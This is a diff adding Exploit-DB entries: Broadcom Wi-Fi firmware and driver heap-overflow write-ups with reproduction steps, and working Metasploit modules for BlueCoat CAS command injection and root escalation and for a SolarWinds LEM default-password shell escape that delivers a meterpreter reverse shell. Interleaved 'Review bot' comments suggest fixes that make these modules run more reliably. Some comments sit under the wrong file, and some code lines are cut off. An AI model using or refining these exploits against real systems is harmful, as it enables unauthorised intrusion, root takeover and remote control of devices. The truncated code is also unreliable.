+12. uint8_t* rsn_ie = bcm_parse_tlvs(..., 48);
+13. if (rsn_ie[1] + 2 + (pos - buffer) > 0xFF) {
+14. ... //Handle overflow
+15. }
+16. memcpy(pos, rsn_ie, rsn_ie[1] + 2); pos += rsn_ie[1] + 2; //RSN-IE
+17.
+18. //Copying the remaining IEs
+19. uint8_t* timeout_ie = bcm_parse_tlvs(..., 56);
+20. uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
+21. memcpy(pos, timeout_ie, 0x7); pos += 0x7; //Timeout Interval IE
+22. memcpy(pos, ft_ie, 0x54); pos += 0x54; //Fast-Transition IE
+
+As can be seen above, although the function verifies that the RSN IE's length does not exceed the allocated buffer (line 13), it fails to verify that the subsequent IEs also do not overflow the buffer. As such, setting the RSN IE's length to a large value (i.e., such that rsn_ie[1] + 2 + (pos - buffer) == 0xFF) will cause the Timeout Interval and Fast Transition IEs to be copied out-of-bounds, overflowing the buffer.
+
+It should be noted that prior to calculating the MIC, the function in charge of processing the TDLS Setup Confirm frame calls a helper function in order to verify the nonce values in the FTIE (to make sure they match the nonces in the TDLS Setup Request and TDLS Setup Response frames, M1 & M2). However, since the attacker is the initiator of the TDLS connection, they may choose the value of Snonce (bytes [52-84) of the FTIE) arbitrarily. This leaves only the Anonce (bytes [20-52) of the FTIE) as uncontrolled bytes during the overflow, since they are chosen by the responder.
+
+It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably.
+
+I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Setup Confirm frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps:
+
+ 1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz
+ 2. Apply the included patch file
+ 3. Build wpa_supplicant (with TDLS support)
+ 4. Use wpa_supplicant to connect to a network
+ 5. Connect to wpa_cli:
+ 5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP "
+
+(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network).
+
+At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while.
+
+I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41806.zip
diff --git a/platforms/hardware/remote/41805.txt b/platforms/hardware/remote/41805.txt
new file mode 100755
index 000000000..a2c8c5185
--- /dev/null
+++ b/platforms/hardware/remote/41805.txt
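Review bot: Reproduction step 5.1 in the new 41806.txt has lost the command's argument: `5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP "` should read `5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP <MAC_ADDRESS_OF_PEER>"`, since the paragraph that follows explains MAC_ADDRESS_OF_PEER and the placeholder has evidently been stripped along with its angle brackets before import. For readers who want the fix rather than the trigger, the pseudo-code's line 13 bounds only the RSN IE copy, so a correct check would also have to cover the fixed 0x7 + 0x54 bytes appended at lines 21–22, roughly `if (rsn_ie[1] + 2 + (pos - buffer) + 0x7 + 0x54 > 0xFF)`; the write-up could state this explicitly rather than leaving it implied by the "line 13" sentence. The same pseudo-code dereferences timeout_ie and ft_ie without a NULL check and copies a fixed 0x54 bytes from ft_ie regardless of its own length byte; the listing is described as approximate, so whether the real firmware validates the presence and size of those IEs elsewhere is not visible here and may be worth confirming with the reporter, because the "only the Anonce is uncontrolled" claim depends on that copy.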
@@ -0,0 +1,133 @@ +Source: +https://bugs.chromium.org/p/project-zero/issues/detail?id=1046 +https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html + +Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. + +One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP). + +In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK). + +When a TDLS Teardown Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS teardown requests is calculated as follows: + +AES-CMAC(TPK-KCK, LinkID-IE || ReasonCode || DialogToken || TransactionSeq || FastTransition-IE) + +(see "wpa_tdls_key_mic_teardown" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c) + +It should be noted that all TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer). + +When the BCM firmware receives a TDLS Teardown frame, it first verifies the Link-ID information element in order to make sure it matches the current link information. 
Then, if the Link ID is valid, it calls the "wlc_tdls_cal_teardown_mic_chk" function in order to verify the MIC of the request. The function starts by extracting the Fast Transition IE information element (FTIE - number 55). Then, if the IE is present, its contents are copied into a heap-allocated buffer of length 256. The copy is performed using the length field present in the IE, and at a fixed offset from the buffer's start address. Since the length of the FTIE is not verified prior to the copy, this allows an attacker to include a large FTIE (e.g., with a length field of 255), causing the memcpy to overflow the heap-allocated buffer. + +Here's the high-level logic of the "wlc_tdls_cal_teardown_mic_chk" function: + +uint8_t* buffer = malloc(256); +... +uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); +memcpy(buffer, linkid_ie, 0x14); +... +uint8_t* ft_ie = bcm_parse_tlvs(..., 55); +memcpy(buf + 0x18, ft_ie, ft_ie[1] + 2); + +(Note that each IE is a TLV; the tag and value fields are each a single byte long. Therefore, ft_ie[1] is the IE's length field). + +It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably. + +I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Teardown frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps: + + 1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz + 2. Apply the included patch file + 3. Build wpa_supplicant (with TDLS support) + 4. Use wpa_supplicant to connect to a network + 5. Connect to wpa_cli: + 5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP " + 5.2. Teardown the connection using "TDLS_TEARDOWN " + +(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network). 
+ +At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while. + +I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions. + +patch + +################################################################################ + +Attaching exploit - running exploit.py results in arbitrary code-execution on the Wi-Fi dongle. + +Here is a high-level overview of the exploit: + + 1. Create a TDLS connection to the target device + 2. Teardown the connection using a crafted "TDLS Teardown Request" frame, triggering the overflow + 3. Create a new TDLS connection, using crafted arguments causing a situation where two chunks in + the freelist overlap one another + 4. Send a TDLS frame with action code 127 + 4.1. Craft the size of the TDLS frame s.t. it overlaps the other chunk in the freelist + 4.2. Craft the contents in order to point the free chunk to the location of a periodic timer + which was created during the firmware's initialization + 5. Send another TDLS frame with action code 127 + 5.1. Craft the size of the TDLS frame s.t. it will be placed on top of the timer object + 5.2. Craft the contents in order to replace the timer's data structures, allowing us to point + the timer's handler function at any arbitrary address. In this case, we point the handler + function at an address near the heap's end + 6. Send a large TDLS frame with action code 127 + 6.1. Craft the frame's contents so that it contains the shellcode we'd like to execute + 7. Since the heap is zero-initialized, and "00 00" is NOP (MOVS R0,R0) in Thumb, this means that + jumping to a location slightly before our created code chunk is fine, as it won't cause any + adverse affects until we reach our code blob. 
Putting all this together, Once the timer + expires, our code chunk is executed on the firmware + +Note that sending crafted "TDLS Teardown Request" frames requires modifications to wpa_supplicant. +Moreover, sending TDLS frames with action code 127 requires modifications to both wpa_supplicant +and to the Linux Kernel (mac80211). + +These changes (and instructions on how to apply them) are included in the exploit archive attached +to this comment. + +TDLSExploit-1.tar.gz + +################################################################################ + +Attaching updated exploits for both the Nexus 5 (MRA58K, BCM4339 6.37.34.40) and the Nexus 6P (NUF26K, BCM4358 version 7.112.201.1). + +TDLSExploit-2.tar.gz + +################################################################################ + +Adding firmware heap visualisers. + + -create_dot_graph.py - Creates a "dot" graph containing the heap's free-chunks + -create_html_main_chunk.py - Creates an HTML visualisation of the heap's main region + -create_html_total.py - Created an HTML visualisation of the entire heap + -create_trace_html.py - Creates an HTML visualisation for traces from the malloc/free patches + -profiles.py - The symbols for each firmware "profile" + -utils.py - Utilities related to handling a firmware snapshot + +BCMHeapVisualisers.tar.gz + +################################################################################ + +Adding script to dump the timer list from a firmware snapshot. + +dump_timers.py + +################################################################################ + +Adding script to dump PCI ring information from firmware snapshot. + +dump_pci.py + +################################################################################ + +Adding inline firmware patcher. + + -patch.py - The patcher itself. 
+ -apply_* - Scripts to apply each of the patches using dhdutil + -/BCMFreePatch - Patch for the "free" function in the firmware + -/BCMMallocPatch - Patch for the "malloc" function in the firmware + -/BCMDumpMPU - Patch that dumps the MPU's contents + +BCMPatcher.tar.gz + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip \ No newline at end of file diff --git a/platforms/hardware/remote/41808.txt b/platforms/hardware/remote/41808.txt new file mode 100755 index 000000000..5b0ce3cec --- /dev/null +++ b/platforms/hardware/remote/41808.txt 
@@ -0,0 +1,60 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1061 + +Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is used in order to communicate with the Wi-Fi SoC (also referred to as "dongle"). + +When the dongle wishes to notify the host OS of an event, it does so by encoding a special "packet" and transmitting it to the host. These packets have an ether type of 0x886C (referred to as ETHER_TYPE_BRCM), and do not contain actual packet data, but rather encapsulate information about events which must be handled by the driver. + +After reading packets from the SDIO interface, the "bcmdhd" driver calls the function "dhd_rx_frame" to handle each of the received frames. If a frame has the special Broadcom ether type, it is passed on to an internal handling function, "dhd_wl_host_event". This function inspects the event code, and passes it onto the registered handlers for the given event type. + +The function "wl_notify_gscan_event" is the registered handler for events of the following types: + -WLC_E_PFN_BEST_BATCHING + -WLC_E_PFN_SCAN_COMPLETE + -WLC_E_PFN_GSCAN_FULL_RESULT + -WLC_E_PFN_SWC + -WLC_E_PFN_BSSID_NET_FOUND + -WLC_E_PFN_BSSID_NET_LOST + -WLC_E_PFN_SSID_EXT + -WLC_E_GAS_FRAGMENT_RX +(for reference, see "wl_init_event_handler") + +Specifically, when the event code "WLC_E_PFN_SWC" is received, the gscan handler function calls "dhd_handle_swc_evt" in order to process the event's data, like so: + +1. void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes) +2. { +3. ... +4. wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data; +5. ... +6. gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan); +7. ... +8. 
if (!params->results_rxed_so_far) { +9. if (!params->change_array) { +10. params->change_array = (wl_pfn_significant_net_t *) +11. kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count, GFP_KERNEL); +12. ... +13. } +14. } +15. ... +16. change_array = ¶ms->change_array[params->results_rxed_so_far]; +17. memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count); +18. params->results_rxed_so_far += results->pkt_count; +19. ... +20. } + +(where "event_data" is the arbitrary data encapsulated in the event passed in from the dongle) + +When the function above is first invoked, the value of "params->change_array" is NULL. An attacker controlling the dongle may send a crafted WLC_E_PFN_SWC event, with the following values: + + - results->total_count = SMALL_VALUE + - result->pkt_count = LARGE_VALUE + +Since the function fails to verify that "pkt_count" is not larger than "total_count", this would cause the allocated buffer (lines 10-11) to be smaller than the size used in the memcpy operation (line 17), thus overflowing the buffer. + +I've been able to statically verify these issues on the "bcmdhd-3.10" driver, and in the corresponding "bcmdhd" driver on the Nexus 6P's kernel (angler). + +Adding sample EtherType exploit which achieves kernel code execution on the Nexus 5. + +This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts the attack once a client with the target MAC connects to the network and sends an ARP request. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41808.zip diff --git a/platforms/linux/local/41786.rb b/platforms/linux/local/41786.rb new file mode 100755 index 000000000..e93137e15 --- /dev/null +++ b/platforms/linux/local/41786.rb 
@@ -0,0 +1,126 @@ +# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS +# Date: April 3, 2017 +# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd +# Contact: chrisdhebert[at]gmail.com +# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 +# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable +# Tested on: BlueCoat CAS 1.3.7.1 +# CVE : cve-2016-9091 + +Timeline: +-------- +08/31/2016 (Vulnerablities Discovered) +03/31/2017 (Final Vendor Patch Confirmed) +04/03/2017 (Public Release) + +Description: +The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. +A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. + +Proof of Concept: + +Metasploit Module - root priv escalation (via mvtroubleshooting.sh) +----------------- +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = AverageRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Exploit::Local::Linux + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', + 'Description' => %q{ + This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate + privileges. In order to work, a tomcat session with access to sudo on the sudoers + is needed. This module is useful for post exploitation of BlueCoat + vulnerabilities, where typically web server privileges are acquired, and this + user is allowed to execute sudo on the sudoers file. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Chris Hebert ', + 'Pete Paccione ', + 'Corey Boyd ' + ], + 'DisclosureDate' => 'Vendor Contacted 8-31-2016', + 'References' => + [ + ['EDB', '##TBD##'], + ['CVE', '2016-9091' ], + ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] + ], + 'Platform' => %w{ linux unix }, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Linux x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0, + } + )) + register_options([ + OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), + ], self.class) + end + + def check + id=cmd_exec("id -un") + if id!="tomcat" + print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") + fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") + end + + clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3") + if clprelease!="1.3.7.1" + print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1") + fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1") + end + + return Exploit::CheckCode::Vulnerable + end + def exploit + print_status("#{peer} - Checking for vulnerable BlueCoat session...") + if check != CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") + end + + print_status("#{peer} - Running Exploit...") + exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" + write_file(exe_file, generate_payload_exe) + cmd_exec "chmod +x #{exe_file}" + + begin + #Backup original nscd init script + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$ + #Replaces /etc/init.d/nscd script with meterpreter payload + cmd_exec "/usr/bin/sudo 
/opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$ + #Executes meterpreter payload as root + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh" + #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1) + ensure + #Restores original nscd init script + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$ + #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it) + cmd_exec "/bin/rm -f #{exe_file}" + end + print_status("#{peer} - The exploit module has finished") + #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. + + end +end + diff --git a/platforms/linux/remote/41785.rb b/platforms/linux/remote/41785.rb new file mode 100755 index 000000000..8dd323d4c --- /dev/null +++ b/platforms/linux/remote/41785.rb 
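Review bot: The three `cmd_exec` strings in `exploit` that wrap `mv_troubleshooting.sh` (backup, replace and restore) end in a stray `$` with no closing quote, so the file contains unterminated string literals and will not load as a Ruby module; this looks like a terminal line-wrap artifact, and each literal needs its full destination path and closing quote restored (use a placeholder such as `<RESTORE_PATH>` until the original source is available). `check` also calls `fail_with` on mismatch, which aborts the run instead of reporting a result; a `check` method should return `Exploit::CheckCode::Safe` (or `Unknown`) and leave `fail_with` to `exploit`, which already branches on the returned code. The `'URL'` reference `'http://https://bto.bluecoat.com/security-advisory/sa138'` has a doubled scheme; drop the `http://` prefix.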
@@ -0,0 +1,197 @@ +# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS +# Date: April 3, 2017 +# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd +# Contact: chrisdhebert[at]gmail.com +# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 +# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable +# Tested on: BlueCoat CAS 1.3.7.1 +# CVE : cve-2016-9091 + +Timeline: +-------- +08/31/2016 (Vulnerablities Discovered) +03/31/2017 (Final Vendor Patch Confirmed) +04/03/2017 (Public Release) + +Description: +The BlueCoat ASG and CAS management consoles are susceptible to an OS command injection vulnerability. +An authenticated malicious administrator can execute arbitrary OS commands with the privileges of the tomcat user. + +Proof of Concept: + +Metasploit Module - Remote Command Injection (via Report Email) +----------------- + +## +# This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "BlueCoat CAS 1.3.7.1 \"Report Email\" Command Injection", + 'Description' => %q{ + BlueCoat CAS 1.3.7.1 (and possibly previous versions) are susceptible to an authenticated Remote Command Injection attack against + the Report Email functionality. This module exploits the vulnerability, resulting in tomcat execute permissions. + Any authenticated user within the 'administrator' group is able to exploit this; however, a user within the 'Readonly' group cannot. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Chris Hebert ', + 'Pete Paccione ', + 'Corey Boyd ' + ], + 'DisclosureDate' => 'Vendor Contacted 8-31-2016', + 'Platform' => %w{ linux unix }, + 'Targets' => + [ + ['BlueCoat CAS 1.3.7.1', {}], + ], + 'DefaultTarget' => 0, + + 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Payload' => + { + 'BadChars' => '', + 'Compat' => + { + #'PayloadType' => 'cmd python cmd_bash cmd_interact', + #'RequiredCmd' => 'generic perl python openssl bash awk', # metasploit may need to fix [bash,awk] + } + }, + 'References' => + [ + ['CVE', '2016-9091'], + ['EDB', '##TBD##'], + ['URL', 'https://bto.bluecoat.com/security-advisory/sa138'] + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Privileged' => true)) + + register_options([ + Opt::RPORT(8082), + OptString.new('USERNAME', [ true, 'Single username' ]), + OptString.new('PASSWORD', [ true, 'Single password' ]) + ], self.class) + end + + #Check BlueCoat CAS version - unauthenticated via GET /avenger/rest/version + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'version') + }) + + clp_version = res.body.split("\<\/serialNumber\>\") + clp_version = clp_version[1] + clp_version = clp_version.split("\<") + clp_version = clp_version[0] + if res and clp_version != "1.3.7.1" + print_status("#{peer} - ERROR - BlueCoat version #{clp_version}, but must be 1.3.7.1") + fail_with(Failure::NotVulnerable, "BlueCoat version #{clp_version}, but must be 1.3.7.1") + end + return Exploit::CheckCode::Vulnerable + end + def exploit + print_status("#{peer} - Checking for vulnerable BlueCoat Host...") + if check != CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not version 1.3.7.1") + end + + print_status("#{peer} - Running Exploit...") + post = { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + + res = 
send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets'), + 'method' => 'POST', + 'vars_post' => post + }) + + unless res && res.code == 201 + print_error("#{peer} - Server did not respond in an expected way") + return + end + + redirect = res.headers['Location'] + ticket1 = redirect.split("\/tickets\/").last + print_status("#{peer} - Step 1 - REQ:Login -> RES:Ticket1 -> #{ticket1}") + + post = { + 'service' => 'http://localhost:8447/avenger/j_spring_cas_security_check' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets', "#{ticket1}"), + 'method' => 'POST', + 'vars_post' => post + }) + + ticket2 = res.body + print_status("#{peer} - Step 2 - REQ:Ticket1 -> RES:Ticket2 -> #{ticket2}") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "avenger/j_spring_cas_security_check?dc=1472496573838&ticket=#{ticket2}") + }) + + unless res && res.code == 302 + print_error("#{peer} - Server did not respond in an expected way") + return + end + cookie = res.get_cookies + print_status("#{peer} - Step 3 - REQ:Ticket2 -> RES:COOKIE -> #{cookie}") + + if cookie.blank? + print_error("#{peer} - Could not retrieve a cookie") + return + end + + unless res && res.code == 302 + print_error("#{peer} - Server did not respond in an expected way") + return + end + + cookie = res.get_cookies + + if cookie.blank? 
+ print_error("#{peer} - Could not retrieve the authenticated cookie") + return + end + + print_status("#{peer} - LOGIN Process Complete ...") + print_status("#{peer} - Exploiting Bluecoat CAS v1.3.7.1 - Report Email ...") + + + if payload.raw.include?("perl") || payload.raw.include?("python") || payload.raw.include?("openssl") + #print_status("#{peer} - DEBUG: asci payload (perl,python, openssl,?bash,awk ") + post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d|sh;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}" + else + #print_status("#{peer} - DEBUG - binary payload (meterpreter,etc, !!") + post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d>/var/log/metasploit.bin;chmod +x /var/log/metasploit.bin;/var/log/metasploit.bin;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}" + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'report-email', 'send'), + 'method' => 'POST', + 'cookie' => cookie, + 'ctype' => 'application/json', + 'data' => post + }) + print_status("#{peer} - Payload sent ...") + end + +end + diff --git a/platforms/linux/remote/41795.rb b/platforms/linux/remote/41795.rb new file mode 100755 index 000000000..74c102246 --- /dev/null +++ b/platforms/linux/remote/41795.rb 
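Review bot: `check` reads `res.body` before testing `res`, so a host that does not answer (`send_request_raw` returning nil) raises `NoMethodError` instead of producing a check result; guard first with `return Exploit::CheckCode::Unknown unless res && res.body`, after which the `if res and clp_version != "1.3.7.1"` test reduces to the version comparison. The same unchecked `res.body` read recurs at Step 2 (`ticket2 = res.body`) in `exploit`. Further down, the `unless res && res.code == 302` / `cookie = res.get_cookies` / `cookie.blank?` sequence is repeated verbatim against the same `res` right after Step 3, so the second copy is dead code and should be removed. As with the sibling module, returning `Exploit::CheckCode::Safe` from `check` rather than calling `fail_with` is the Metasploit convention.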
@@ -0,0 +1,164 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "SolarWind LEM Default SSH Password Remote Code Execution", + 'Description' => %q{ + This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH + service is accessed with the default username and password which is "cmc" and "password". By exploiting a + vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + + This module was tested against SolarWinds LEM v6.3.1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ', # discovery & msf module + ], + 'References' => + [ + ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp', + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(32022), + OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]), + OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]), + ] + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def exploit + factory 
= ssh_socket_factory + opts = { + :auth_methods => ['keyboard-interactive'], + :port => rport, + :use_agent => false, + :config => false, + :password => password, + :proxy => factory, + :non_interactive => true + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + print_status("#{rhost}:#{rport} - Attempting to login...") + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, username, opts) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials." + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + payload_executed = false + print_good("SSH connection is established.") + + ssh.open_channel do |channel| + print_status("Requesting pty... We need it in order to interact with menuing system.") + + channel.request_pty do |ch, success| + raise ::RuntimeError, "Could not request pty!" unless success + print_good("Pty successfully obtained.") + + print_status("Requesting a shell.") + ch.send_channel_request("shell") do |ch, success| + raise ::RuntimeError, "Could not open shell!" unless success + print_good("Remote shell successfully obtained.") + end + end + + channel.on_data do |ch, data| + if data.include? "cmc " + print_good("Step 1 is done. Managed to access terminal menu.") + channel.send_data("service\n") + end + + if data.include? "service " + print_good("Step 2 is done. Managed to select 'service' sub menu.") + channel.send_data("restrictssh\n") + end + + if data.include? "Press to configure restriction on the SSH service to the Manager Appliance" + print_good("Step 3 is done. 
Managed to start 'restrictssh' function.") + channel.send_data("*#`bash>&2`\n") + end + + if data.include? "Are the hosts" + print_good("Step 4 is done. We are going to try escape from jail shell.") + channel.send_data("Y\n") + end + + if data.include? "/usr/local/contego" + if payload_executed == false + print_good("Sweet..! Escaped from jail.") + print_status("Delivering payload...") + channel.send_data("python -c \"#{payload.encoded}\"\n") + payload_executed = true + end + end + + end + end + ssh.loop unless session_created? + end + end + +end diff --git a/platforms/macos/dos/41790.c b/platforms/macos/dos/41790.c new file mode 100755 index 000000000..76b61cc68 --- /dev/null +++ b/platforms/macos/dos/41790.c 
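Review bot: The `rescue Net::SSH::AuthenticationFailed` arm in `exploit` prints an error but, unlike every sibling arm, does not `return`, so control falls through to `if ssh` with `ssh` still nil and the module exits without a reported failure; make it `fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials.")`, or at least add `return`. The `on_data` handler tests each prompt with independent `if`s and no step counter, so a data chunk containing more than one expected string, or a prompt echoed a second time, can resend `service\n` or `restrictssh\n` out of sequence; only the last step is guarded by `payload_executed`, and the same guard pattern (or a `step` index) would make the earlier steps idempotent. The session is never closed once `ssh.loop` returns; an `ensure ssh.close if ssh` around the channel work would release it.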
